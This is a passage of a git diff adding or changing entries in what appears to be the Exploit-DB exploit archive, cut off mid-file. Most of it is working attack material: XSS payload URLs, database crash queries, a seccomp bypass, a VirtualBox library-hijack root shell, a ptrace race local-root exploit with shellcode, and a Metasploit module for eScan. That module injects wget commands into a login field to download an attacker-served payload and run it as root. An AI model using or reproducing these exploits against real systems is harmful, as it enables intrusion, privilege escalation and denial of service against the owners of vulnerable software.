scripting vulnerability and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. + +Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. + +We don't know which versions of Subscriber Edge Services Manager are affected. We will update this BID as more information emerges. + +http://www.example.com/servlet/JavascriptProbe?prevURL=http%3A//host/servlet/JavascriptProbe%3FprevURL%3Dhttp%253A//host/&browser=explorer&version=6&javascript=1.3& +getElementById=true&getElementTagName=true&documentElement=true&anchors=true®exp=true&option=true&all=true&cookie=true&images=true&layers=false&forms= +true&links=true&frames=true&screen=%20true">" + + +http://www.example.com/servlet/JavascriptProbe?prevURL=http%3A//host/servlet/JavascriptProbe%3FprevURL%3D%22%3E%3C&browser=explorer&version=6&javascript=1.3&getElem +entById=true&getElementTagName=true&documentElement=true&anchors=true®exp=true&option=true&all=true&cookie=true&images=true&layers=false&forms=true&li +nks=trueHTML +Injection&frames=true&screen=true& diff --git a/platforms/java/webapps/32909.txt b/platforms/java/webapps/32909.txt new file mode 100755 index 000000000..df7fe078a --- /dev/null +++ b/platforms/java/webapps/32909.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/34531/info + +Novell Teaming is prone to a user-enumeration weakness and multiple cross-site scripting vulnerabilities. + +A remote attacker can exploit the user-enumeration weakness to enumerate valid usernames and then perform brute-force attacks; other attacks are also possible. + +The attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Novell Teaming 1.0.3 is vulnerable; other versions may also be affected. + +https://www.example.com/web/guest/home?p_p_id=82&p_p_action=1&p_p_state=%3Cscript%3Ealert('xss+vulnerability')%3C/script%3E&p_p_mode=view&p_p_col_id=column-2&p_p_col_pos=1&p_p_col_count=2&_82_struts_action=%2Flanguage%2Fview&_82_languageId=de_DE \ No newline at end of file diff --git a/platforms/linux/dos/32775.txt b/platforms/linux/dos/32775.txt new file mode 100755 index 000000000..e06a4e240 --- /dev/null +++ b/platforms/linux/dos/32775.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/33618/info + +The Linux kernel is prone to a local denial-of-service vulnerability because it fails to properly handle malformed filesystem images. + +Attackers can exploit this issue to cause the kernel to crash, denying service to legitimate users. Note that to exploit this issue, attackers must be able to mount appropriate filesystem types, which may require membership in a privileged group or root access. + +This issue affects versions prior to Linux kernel 2.6.27.14. + +http://www.exploit-db.com/sploits/32775.gz \ No newline at end of file diff --git a/platforms/linux/dos/32800.txt b/platforms/linux/dos/32800.txt new file mode 100755 index 000000000..0d113811e --- /dev/null +++ b/platforms/linux/dos/32800.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/33749/info + +Poppler is prone to multiple denial-of-service vulnerabilities when handling malformed PDF files. + +Successfully exploiting this issue allows remote attackers to crash applications that use the vulnerable library, denying service to legitimate users. + +These issues affect versions prior to Poppler 0.10.4. + +http://www.exploit-db.com/sploits/32800.pdf \ No newline at end of file diff --git a/platforms/linux/dos/32838.txt b/platforms/linux/dos/32838.txt new file mode 100755 index 000000000..64f8a06a4 --- /dev/null +++ b/platforms/linux/dos/32838.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/33972/info + +MySQL is prone to a remote denial-of-service vulnerability because it fails to handle certain XPath expressions. + +An attacker can exploit this issue to crash the application, denying access to legitimate users. + +This issue affects: + +MySQL 5.1.31 and earlier +MySQL 6.0.9 and earlier + +select updatexml('','0/a',''); +select extractvalue('','0/a'); \ No newline at end of file diff --git a/platforms/linux/dos/32849.txt b/platforms/linux/dos/32849.txt new file mode 100755 index 000000000..df517635c --- /dev/null +++ b/platforms/linux/dos/32849.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/34090/info + +PostgreSQL is prone to a remote denial-of-service vulnerability. + +Exploiting this issue may allow attackers to terminate connections to the PostgreSQL server, denying service to legitimate users. + +test=# CREATE DEFAULT CONVERSION test1 FOR 'LATIN1' TO 'KOI8' FROM +ascii_to_mic; +CREATE CONVERSION +test=# CREATE DEFAULT CONVERSION test2 FOR 'KOI8' TO 'LATIN1' FROM +mic_to_ascii; +CREATE CONVERSION +test=# set client_encoding to 'LATIN1'; \ No newline at end of file diff --git a/platforms/linux/dos/32856.txt b/platforms/linux/dos/32856.txt new file mode 100755 index 000000000..7d88d8f17 --- /dev/null +++ b/platforms/linux/dos/32856.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/34136/info + +MPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed media files. + +Successfully exploiting this issue allows remote attackers to deny service to legitimate users. + +http://www.exploit-db.com/sploits/32856.aac \ No newline at end of file diff --git a/platforms/linux/dos/32857.txt b/platforms/linux/dos/32857.txt new file mode 100755 index 000000000..d886def3e --- /dev/null +++ b/platforms/linux/dos/32857.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/34136/info + +MPlayer is prone to multiple denial-of-service vulnerabilities when handling malformed media files. + +Successfully exploiting this issue allows remote attackers to deny service to legitimate users. + +http://www.exploit-db.com/sploits/32857.ogm \ No newline at end of file diff --git a/platforms/linux/local/32815.c b/platforms/linux/local/32815.c new file mode 100755 index 000000000..f296bb14d --- /dev/null +++ b/platforms/linux/local/32815.c @@ -0,0 +1,41 @@ +source: http://www.securityfocus.com/bid/33906/info + +The Linux kernel is prone to an origin-validation weakness when dealing with signal handling. + +This weakness occurs when a privileged process calls attacker-supplied processes as children. Attackers may exploit this to send arbitrary signals to the privileged parent process. + +A local attacker may exploit this issue to kill vulnerable processes, resulting in a denial-of-service condition. In some cases, other attacks may also be possible. + +Linux kernel 2.6.28 is vulnerable; other versions may also be affected. + +#include +#include +#include +#include + +static int the_child(void* arg) { + sleep(1); + _exit(2); +} + +int main(int argc, const char* argv[]) { + int ret = fork(); + if (ret < 0) + { + perror("fork"); + _exit(1); + } + else if (ret > 0) + { + for (;;); + } + setgid(99); + setuid(65534); + { + int status; + char* stack = malloc(4096); + int flags = SIGKILL | CLONE_PARENT; + int child = clone(the_child, stack + 4096, flags, NULL); + } + _exit(100); +} diff --git a/platforms/linux/local/32820.txt b/platforms/linux/local/32820.txt new file mode 100755 index 000000000..4a858ae32 --- /dev/null +++ b/platforms/linux/local/32820.txt @@ -0,0 +1,30 @@ +source: http://www.securityfocus.com/bid/33922/info + +OpenSC is prone to an unauthorized-access vulnerability. + +Attackers can exploit this issue to gain unauthorized access to private data, which may lead to other attacks. + +Versions prior to OpenSC 0.11.7 are vulnerable. + +The following proof of concept is available: + +create a file with a secret: +echo "This is my secret data" > secret-file + +To initialise a blank card: +pkcs15-init --create-pkcs15 --use-default-transport-keys --profile pkcs15+onepin --pin 123456 --puk 78907890 + +To write a private data object to the card: +pkcs11-tool --label "my secret" --type data --write-object secret-file +--private --login --pin 12345 + +To see all objects on the card: +pkcs15-tool --dump +This will list the data object, including the path it is stored, e.g.: +"Path: 3f0050154701" + +To access such an object with low-level tools: + +opensc-explorer +cd 5015 +get 4701 \ No newline at end of file diff --git a/platforms/linux/local/32829.c b/platforms/linux/local/32829.c new file mode 100755 index 000000000..a183bf01c --- /dev/null +++ b/platforms/linux/local/32829.c @@ -0,0 +1,65 @@ +source: http://www.securityfocus.com/bid/33948/info + +The Linux kernel is prone to a local security-bypass vulnerability. + +A local attacker may be able to exploit this issue to bypass access control and make restricted system calls, which may result in an elevation of privileges. + + /* test case for seccomp circumvention on x86-64 + There are two failure modes: compile with -m64 or compile with -m32. + + The -m64 case is the worst one, because it does "chmod 777 ." (could + be any chmod call). The -m32 case demonstrates it was able to do + stat(), which can glean information but not harm anything directly. + + A buggy kernel will let the test do something, print, and exit 1; a + fixed kernel will make it exit with SIGKILL before it does anything. + */ + + #define _GNU_SOURCE + #include + #include + #include + #include + #include + #include + #include + + int + main (int argc, char **argv) + { + char buf[100]; + static const char dot[] = "."; + long ret; + unsigned st[24]; + if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0) + perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?"); + #ifdef __x86_64__ + assert ((uintptr_t) dot < (1UL << 32)); + asm ("int $0x80 # %0 <- %1(%2 %3)" + : "=a" (ret) : "0" (15), "b" (dot), "c" (0777)); + ret = snprintf (buf, sizeof buf, + "result %ld (check mode on .!)\n", ret); + #elif defined __i386__ + asm (".code32\n" + "pushl %%cs\n" + "pushl $2f\n" + "ljmpl $0x33, $1f\n" + ".code64\n" + "1: syscall # %0 <- %1(%2 %3)\n" + "lretl\n" + ".code32\n" + "2:" + : "=a" (ret) : "0" (4), "D" (dot), "S" (&st)); + if (ret == 0) + ret = snprintf (buf, sizeof buf, + "stat . -> st_uid=%u\n", st[7]); + else + ret = snprintf (buf, sizeof buf, "result %ld\n", ret); + #else + # error "not this one" + #endif + write (1, buf, ret); + + syscall (__NR_exit, 1); + return 2; + } diff --git a/platforms/linux/local/32848.txt b/platforms/linux/local/32848.txt new file mode 100755 index 000000000..e4c350d78 --- /dev/null +++ b/platforms/linux/local/32848.txt @@ -0,0 +1,42 @@ +source: http://www.securityfocus.com/bid/34080/info + +Sun xVM VirtualBox is prone to a local privilege-escalation vulnerability. + +An attacker can exploit this vulnerability to run arbitrary code with superuser privileges. + +The following versions for the Linux platform are vulnerable: + +Sun xVM VirtualBox 2.0 +Sun xVM VirtualBox 2.1 + +$ id -u +1002 + +$ cat test.c +#include +#include +__attribute__((constructor)) +void awesome(void) +{ + char *argv[] = { "sh", NULL }; + extern char *environ; + syscall(SYS_setuid, 0); + syscall(SYS_execve, "/bin/sh", argv, environ); +} + +$ gcc -Wall test.c -fPIC -shared -o libdl.so.2 -Wl,-soname,libdl.so.2 + +$ ls -l /opt/VirtualBox/VirtualBox +-r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 /opt/VirtualBox/VirtualBox + +$ ln /opt/VirtualBox/VirtualBox + +$ ls -l VirtualBox +-r-s--x--x 2 root vboxusers 23808 2009-01-30 01:57 VirtualBox + +$ ./VirtualBox +./VirtualBox: /home/vapier/libdl.so.2: no version information available +(required by ./VirtualBox) +sh-4.0# whoami +root + diff --git a/platforms/linux/local/8678.c b/platforms/linux/local/8678.c index f21fdcd10..d47ad6c04 100755 --- a/platforms/linux/local/8678.c +++ b/platforms/linux/local/8678.c @@ -1,101 +1,101 @@ -/* -* GNU/Linux kernel 2.6.29 ptrace_attach() local root race condition exploit. -* ========================================================================== -* This is a local root exploit for the 2.6.29 ptrace_attach() race condition that allows -* a process to gain elevated privileges under certain conditions. The vulnerability is -* caused due to "ptrace_attach()" using an inadequate mutex while synchronizing with -* "execve()". This can be exploited to potentially execute arbitrary code with root -* privileges by attaching to a setuid process. The race is particularly narrow, this -* exploit checks that it has attached to the correct process before attempting to -* inject shellcode which helps reduce false positives and shells being spawned with -* lower privileges. -* -* Ex. -* matthew@matthew-desktop:~$ id -* uid=1000(matthew) gid=1000(matthew) groups=4(adm),20(dialout),24(cdrom),25(floppy), -* 29(audio),30(dip),44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(matthew) -* matthew@matthew-desktop:~$ uname -a -* Linux matthew-desktop 2.6.29-020629-generic #020629 SMP Tue Mar 24 12:03:21 UTC 2009 i686 GNU/Linux -* matthew@matthew-desktop:~$ while `/bin/true/`;do ./shoryuken;done -* [... much scroll removed, go make coffee, get a job, do something while running ...] -* /dev/sda1 on / type ext3 (rw,relatime,errors=remount-ro) -* proc on /proc type proc (rw,noexec,nosuid,nodev) -* /sys on /sys type sysfs (rw,noexec,nosuid,nodev) -* varrun on /var/run type tmpfs (rw,noexec,nosuid,nodev,mode=0755) -* varlock on /var/lock type tmpfs (rw,noexec,nosuid,nodev,mode=1777) -* udev on /dev type tmpfs (rw,mode=0755) -* devshm on /dev/shm type tmpfs (rw) -* devpts on /dev/pts type devpts (rw,gid=5,mode=620) -* securityfs on /sys/kernel/security type securityfs (rw) -* gvfs-fuse-daemon on /home/matthew/.gvfs type fuse.gvfs-fuse-daemon (rw,nosuid,nodev,user=matthew) -* [ WIN! 18281 -* [ Overwritten 0xb8097430 -* # id -* uid=0(root) gid=1000(matthew) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip), -* 44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(matthew) -* # -* -* Please note this exploit is released to you under fuqHAK5 licence agreement, you may use -* this exploit, sell it, recode it, rip the header and claim it as your own on the condition -* that you are not a fan of the hak5 tv "hacking" show. This exploit must not be renamed from -* shoryuken.c at any time. -* -* -- prdelka -*/ -#include -#include -#include -#include -#include -#include -#include - -char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" - "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" - "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" - "\x90" - "\x6a\x23\x58\x31" - "\xdb\xcd\x80" - "\x31\xdb\x8d\x43\x17\xcd\x80\x31\xc0" - "\x50\x68""//sh""\x68""/bin""\x89\xe3\x50" - "\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; - -int main(){ - pid_t child; - int eip, i = 0; - struct user_regs_struct regs; - char *argv[] = {"mount",0}; - char *envp[] = {"",0}; - child = fork(); - if(child == 0) { - execve("/bin/mount",argv,envp); - } - else { - if(ptrace(PTRACE_ATTACH, child, NULL, NULL) == 0) { - char buf[256]; - sprintf(buf, "/proc/%d/cmdline", child); - int fd = open(buf, O_RDONLY); - read(fd, buf, 2); - close(fd); - if(buf[0] == 'm') { - printf("[ WIN! %d\n", child); - fflush(stdout); - ptrace(PTRACE_GETREGS, child, NULL, ®s); - eip = regs.eip; - while (i < strlen(shellcode)){ - ptrace(PTRACE_POKETEXT, child, eip, (int) *(int *) (shellcode + i)); - i += 4; - eip += 4; - } - printf("[ Overwritten 0x%x\n",regs.eip); - ptrace(PTRACE_SETREGS, child, NULL, ®s); - ptrace(PTRACE_DETACH, child, NULL,NULL); - usleep(1); - wait(0); - } - } - } - return 0; -} - -// milw0rm.com [2009-05-14] +/* +* GNU/Linux kernel 2.6.29 ptrace_attach() local root race condition exploit. +* ========================================================================== +* This is a local root exploit for the 2.6.29 ptrace_attach() race condition that allows +* a process to gain elevated privileges under certain conditions. The vulnerability is +* caused due to "ptrace_attach()" using an inadequate mutex while synchronizing with +* "execve()". This can be exploited to potentially execute arbitrary code with root +* privileges by attaching to a setuid process. The race is particularly narrow, this +* exploit checks that it has attached to the correct process before attempting to +* inject shellcode which helps reduce false positives and shells being spawned with +* lower privileges. +* +* Ex. +* matthew@matthew-desktop:~$ id +* uid=1000(matthew) gid=1000(matthew) groups=4(adm),20(dialout),24(cdrom),25(floppy), +* 29(audio),30(dip),44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(matthew) +* matthew@matthew-desktop:~$ uname -a +* Linux matthew-desktop 2.6.29-020629-generic #020629 SMP Tue Mar 24 12:03:21 UTC 2009 i686 GNU/Linux +* matthew@matthew-desktop:~$ while `/bin/true/`;do ./shoryuken;done +* [... much scroll removed, go make coffee, get a job, do something while running ...] +* /dev/sda1 on / type ext3 (rw,relatime,errors=remount-ro) +* proc on /proc type proc (rw,noexec,nosuid,nodev) +* /sys on /sys type sysfs (rw,noexec,nosuid,nodev) +* varrun on /var/run type tmpfs (rw,noexec,nosuid,nodev,mode=0755) +* varlock on /var/lock type tmpfs (rw,noexec,nosuid,nodev,mode=1777) +* udev on /dev type tmpfs (rw,mode=0755) +* devshm on /dev/shm type tmpfs (rw) +* devpts on /dev/pts type devpts (rw,gid=5,mode=620) +* securityfs on /sys/kernel/security type securityfs (rw) +* gvfs-fuse-daemon on /home/matthew/.gvfs type fuse.gvfs-fuse-daemon (rw,nosuid,nodev,user=matthew) +* [ WIN! 18281 +* [ Overwritten 0xb8097430 +* # id +* uid=0(root) gid=1000(matthew) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip), +* 44(video),46(plugdev),107(fuse),109(lpadmin),115(admin),1000(matthew) +* # +* +* Please note this exploit is released to you under fuqHAK5 licence agreement, you may use +* this exploit, sell it, recode it, rip the header and claim it as your own on the condition +* that you are not a fan of the hak5 tv "hacking" show. This exploit must not be renamed from +* shoryuken.c at any time. +* +* -- prdelka +*/ +#include +#include +#include +#include +#include +#include +#include + +char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" + "\x90" + "\x6a\x23\x58\x31" + "\xdb\xcd\x80" + "\x31\xdb\x8d\x43\x17\xcd\x80\x31\xc0" + "\x50\x68""//sh""\x68""/bin""\x89\xe3\x50" + "\x53\x89\xe1\x99\xb0\x0b\xcd\x80"; + +int main(){ + pid_t child; + int eip, i = 0; + struct user_regs_struct regs; + char *argv[] = {"mount",0}; + char *envp[] = {"",0}; + child = fork(); + if(child == 0) { + execve("/bin/mount",argv,envp); + } + else { + if(ptrace(PTRACE_ATTACH, child, NULL, NULL) == 0) { + char buf[256]; + sprintf(buf, "/proc/%d/cmdline", child); + int fd = open(buf, O_RDONLY); + read(fd, buf, 2); + close(fd); + if(buf[0] == 'm') { + printf("[ WIN! %d\n", child); + fflush(stdout); + ptrace(PTRACE_GETREGS, child, NULL, ®s); + eip = regs.eip; + while (i < strlen(shellcode)){ + ptrace(PTRACE_POKETEXT, child, eip, (int) *(int *) (shellcode + i)); + i += 4; + eip += 4; + } + printf("[ Overwritten 0x%x\n",regs.eip); + ptrace(PTRACE_SETREGS, child, NULL, ®s); + ptrace(PTRACE_DETACH, child, NULL,NULL); + usleep(1); + wait(0); + } + } + } + return 0; +} + +// milw0rm.com [2009-05-14] diff --git a/platforms/linux/remote/32825.txt b/platforms/linux/remote/32825.txt new file mode 100755 index 000000000..42a252a62 --- /dev/null +++ b/platforms/linux/remote/32825.txt @@ -0,0 +1,32 @@ +source: http://www.securityfocus.com/bid/33937/info + +The 'djbdns' package is prone to a remote cache-poisoning vulnerability. + +An attacker may leverage this issue to manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks. + +This issue affects djbdns 1.05; other versions may also be vulnerable. + +# Download and build ucspi-tcp-0.88. +$ curl -O http://cr.yp.to/ucspi-tcp/ucspi-tcp-0.88.tar.gz +$ tar -zxf ucspi-tcp-0.88.tar.gz +$ echo 'gcc -include /usr/include/errno.h -O' > ucspi-tcp-0.88/conf-cc +$ make -C ucspi-tcp-0.88 + +# Download and build djbdns-1.05. +$ curl -O http://cr.yp.to/djbdns/djbdns-1.05.tar.gz +$ tar -zxf djbdns-1.05.tar.gz +$ echo 'gcc -include /usr/include/errno.h -O' > djbdns-1.05/conf-cc +$ make -C djbdns-1.05 + +# Use tcpclient and axfr-get to do a zone transfer for +# www.example.com from www.example2.com. +$ ./ucspi-tcp-0.88/tcpclient www.example.com 53 ./djbdns-1.05/axfr-get www.example.com data data.tmp + +# Use tinydns-data to compile data into data.cdb. +$ ./djbdns-1.05/tinydns-data + +# Simulate an A query for www.example.com using the data +# from the zone transfer. +$ ./djbdns-1.05/tinydns-get a www.example.com + + diff --git a/platforms/linux/remote/32834.txt b/platforms/linux/remote/32834.txt new file mode 100755 index 000000000..7a3ae5e8d --- /dev/null +++ b/platforms/linux/remote/32834.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/33962/info + +cURL/libcURL is prone to a security-bypass vulnerability. + +Remote attackers can exploit this issue to bypass certain security restrictions and carry out various attacks. + +This issue affects cURL/libcURL 5.11 through 7.19.3. Other versions may also be vulnerable. + +The following example redirection request may be used to carry out this attack: +Location: scp://name:passwd@host/a'``;date >/tmp/test``;' \ No newline at end of file diff --git a/platforms/linux/remote/32837.py b/platforms/linux/remote/32837.py new file mode 100755 index 000000000..8e4461a88 --- /dev/null +++ b/platforms/linux/remote/32837.py @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/33971/info + +Wesnoth is prone to a remote code-execution vulnerability caused by a design error. + +Attackers can exploit this issue to execute arbitrary Python code in the context of the user running the vulnerable application. + +Versions prior to Wesnoth 1.5.11 are affected. + +#!WPY +import threading +os = threading._sys.modules['os'] +f = os.popen("firefox 'http://www.example.com'") +f.close() \ No newline at end of file diff --git a/platforms/linux/remote/764.c b/platforms/linux/remote/764.c index 5965e8818..bc83a3384 100755 --- a/platforms/linux/remote/764.c +++ b/platforms/linux/remote/764.c @@ -1,4 +1,6 @@ /* + * http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/ + * * OF version r00t VERY PRIV8 spabam * Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto * objdump -R /usr/sbin/httpd|grep free to get more targets @@ -1291,4 +1293,4 @@ int main(int argc, char* argv[]) } /* spabam: It isn't 0day */ -// milw0rm.com [2003-04-04] +// milw0rm.com [2003-04-04] \ No newline at end of file diff --git a/platforms/linux/webapps/32869.rb b/platforms/linux/webapps/32869.rb new file mode 100755 index 000000000..dbcf1048b --- /dev/null +++ b/platforms/linux/webapps/32869.rb @@ -0,0 +1,166 @@ +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info={}) + super(update_info(info, + 'Name' => "eScan Web Management Console Command Injection", + 'Description' => %q{ + This module exploits a command injection vulnerability found in the eScan Web Management + Console. The vulnerability exists while processing CheckPass login requests. An attacker + with a valid username can use a malformed password to execute arbitrary commands. With + mwconf privileges, the runasroot utility can be abused to get root privileges. This module + has been tested successfully on eScan 5.5-2 on Ubuntu 12.04. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Joxean Koret', # Vulnerability Discovery and PoC + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'URL', 'http://www.joxeankoret.com/download/breaking_av_software-pdf.tar.gz' ] # Syscan slides by Joxean + ], + 'Payload' => + { + 'BadChars' => "", # Real bad chars when injecting: "|&)(!><'\"` ", cause of it we're avoiding ARCH_CMD + 'DisableNops' => true + }, + 'Arch' => ARCH_X86, + 'Platform' => 'linux', + 'Privileged' => true, + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'Targets' => + [ + ['eScan 5.5-2 / Linux', {}], + ], + 'DisclosureDate' => "Apr 04 2014", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(10080), + OptString.new('USERNAME', [ true, 'A valid eScan username' ]), + OptString.new('TARGETURI', [true, 'The base path to the eScan Web Administration console', '/']), + OptString.new('EXTURL', [ false, 'An alternative host to request the EXE payload from' ]), + OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]), + OptString.new('WRITABLEDIR', [ true, 'A directory where we can write files', '/tmp' ]), + OptString.new('RUNASROOT', [ true, 'Path to the runasroot binary', '/opt/MicroWorld/sbin/runasroot' ]), + ], self.class) + end + + + def check + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path.to_s, 'index.php') + }) + + if res and res.code == 200 and res.body =~ /eScan WebAdmin/ + return Exploit::CheckCode::Detected + end + + Exploit::CheckCode::Unknown + end + + def cmd_exec(session, cmd) + case session.type + when /meterpreter/ + print_warning("#{peer} - Use a shell payload in order to get root!") + when /shell/ + o = session.shell_command_token(cmd) + o.chomp! if o + end + return "" if o.nil? + return o + end + + # Escalating privileges here because runasroot only can't be executed by + # mwconf uid (196). + def on_new_session(session) + cmd_exec(session, "#{datastore['RUNASROOT'].shellescape} /bin/sh") + super + end + + def primer + @payload_url = get_uri + wget_payload + end + + def on_request_uri(cli, request) + print_status("Request: #{request.uri}") + if request.uri =~ /#{Regexp.escape(get_resource)}/ + print_status("Sending payload...") + send_response(cli, @pl) + end + end + + def exploit + @pl = generate_payload_exe + if @pl.blank? + fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload") + end + @payload_url = "" + + if datastore['EXTURL'].blank? + begin + Timeout.timeout(datastore['HTTPDELAY']) {super} + rescue Timeout::Error + end + exec_payload + else + @payload_url = datastore['EXTURL'] + wget_payload + exec_payload + end + end + + # we execute in this way, instead of an ARCH_CMD + # payload because real badchars are: |&)(!><'"`[space] + def wget_payload + @dropped_elf = rand_text_alpha(rand(5) + 3) + command = "wget${IFS}#{@payload_url}${IFS}-O${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)}" + + print_status("#{peer} - Downloading the payload to the target machine...") + res = exec_command(command) + if res && res.code == 302 && res.headers['Location'] && res.headers['Location'] =~ /index\.php\?err_msg=password/ + register_files_for_cleanup(File.join(datastore['WRITABLEDIR'], @dropped_elf)) + else + fail_with(Failure::Unknown, "#{peer} - Failed to download the payload to the target") + end + end + + def exec_payload + command = "chmod${IFS}777${IFS}#{File.join(datastore['WRITABLEDIR'], @dropped_elf)};" + command << File.join(datastore['WRITABLEDIR'], @dropped_elf) + + print_status("#{peer} - Executing the payload...") + exec_command(command, 1) + end + + def exec_command(command, timeout=20) + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path.to_s, 'login.php'), + 'vars_post' => { + 'uname' => datastore['USERNAME'], + 'pass' => ";#{command}", + 'product_name' => 'escan', + 'language' => 'English', + 'login' => 'Login' + } + }, timeout) + end + +end \ No newline at end of file diff --git a/platforms/multiple/dos/32836.html b/platforms/multiple/dos/32836.html new file mode 100755 index 000000000..bf34a923a --- /dev/null +++ b/platforms/multiple/dos/32836.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/33969/info + +Mozilla Firefox is prone to a remote denial-of-service vulnerability. + +Successful exploits can allow attackers to crash the affected browser, resulting in denial-of-service conditions. + +Firefox 2.0.0.20 is vulnerable; other versions may also be affected. + +FireFox Print() Function Malform input Crash --------------In The Name Of God---------------
---------Apa Center Of Yazd University---------
-------------Http://Www.Ircert.Cc--------------

Tested On : FireFox <= 2.0.0.20 Fully Update
Note : If the browser alert for print choose cancel

Author : b3hz4d (Seyed Behzad Shaghasemi)
Site : Www.DeltaHacking.Net
Date : 3 Mar 2009
Contact: behzad_sh_66@yahoo.com
Special Thanks To : Str0ke, Dr.trojan, Cru3l.b0y, PLATEN, Bl4ck.Viper, Irsdl And all Iranian hackers

\ No newline at end of file diff --git a/platforms/multiple/dos/32865.py b/platforms/multiple/dos/32865.py new file mode 100755 index 000000000..0c3e7f717 --- /dev/null +++ b/platforms/multiple/dos/32865.py @@ -0,0 +1,118 @@ +#!/usr/bin/python +#-*- coding: utf-8 -* + +# Title: WhatsApp Remote Crash on non-printable characters +# Product: WhatsApp +# Vendor Homepage: http://www.whatsapp.com +# Vulnerable Version(s): 2.11.7 and prior on iOS +# Tested on: WhatsApp v2.11.7 on iPhone 5 running iOS 7.0.4 +# Solution Status: Fixed by Vendor on v2.11.8 +# Date: 8/04/2014 +# +# Authors: +# Jaime Sánchez @segofensiva +# Pablo San Emeterio @psaneme +# +# Custom message with non-printable characters will crash any WhatsApp client < v2.11.7 for iOS. +# It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even +# engaging in an interactive conversation over WhatsApp protocol +# +# More info at: +# http://www.seguridadofensiva.com/2014/04/crash-en-whatsapp-para-iphone-en-versiones-inferiores-a-2.11.7.html +# See the slides of the research/talk at RootedCON 2014 at: +# http://www.slideshare.net/segofensiva/whatsapp-mentiras-y-cintas-de-video-rootedcon-2014 + +import argparse, sys, os, csv +from Yowsup.Common.utilities import Utilities +from Yowsup.Common.debugger import Debugger +from Yowsup.Common.constants import Constants +from Examples.CmdClient import WhatsappCmdClient +from Examples.EchoClient import WhatsappEchoClient +from Examples.ListenerClient import WhatsappListenerClient +from Yowsup.Registration.v1.coderequest import WACodeRequest +from Yowsup.Registration.v1.regrequest import WARegRequest +from Yowsup.Registration.v1.existsrequest import WAExistsRequest +from Yowsup.Registration.v2.existsrequest import WAExistsRequest as WAExistsRequestV2 +from Yowsup.Registration.v2.coderequest import WACodeRequest as WACodeRequestV2 +from Yowsup.Registration.v2.regrequest import WARegRequest as WARegRequestV2 +from Yowsup.Contacts.contacts import WAContactsSyncRequest + +import threading,time, base64 + +DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth" +COUNTRIES_CSV = "countries.csv" + +DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth" + + +######## Yowsup Configuration file ##################### +# Your configuration should contain info about your login credentials to Whatsapp. This typically consist of 3 fields:\n +# phone: Your full phone number including country code, without '+' or '00' +# id: This field is used in registration calls (-r|-R|-e), and for login if you are trying to use an existing account that is setup +# on a physical device. Whatsapp has recently deprecated using IMEI/MAC to generate the account's password in updated versions +# of their clients. Use --v1 switch to try it anyway. Typically this field should contain the phone's IMEI if your account is setup on +# a Nokia or an Android device, or the phone's WLAN's MAC Address for iOS devices. If you are not trying to use existing credentials +# or want to register, you can leave this field blank or set it to some random text. +# password: Password to use for login. You obtain this password when you register using Yowsup. +###################################################### +MINE_CONFIG ="config.cfg" + +def getCredentials(config = DEFAULT_CONFIG): + if os.path.isfile(config): + f = open(config) + + phone = "" + idx = "" + pw = "" + cc = "" + + try: + for l in f: + line = l.strip() + if len(line) and line[0] not in ('#',';'): + + prep = line.split('#', 1)[0].split(';', 1)[0].split('=', 1) + + varname = prep[0].strip() + val = prep[1].strip() + + if varname == "phone": + phone = val + elif varname == "id": + idx = val + elif varname =="password": + pw =val + elif varname == "cc": + cc = val + + return (cc, phone, idx, pw); + except: + pass + + return 0 + +def main(phone): + credentials 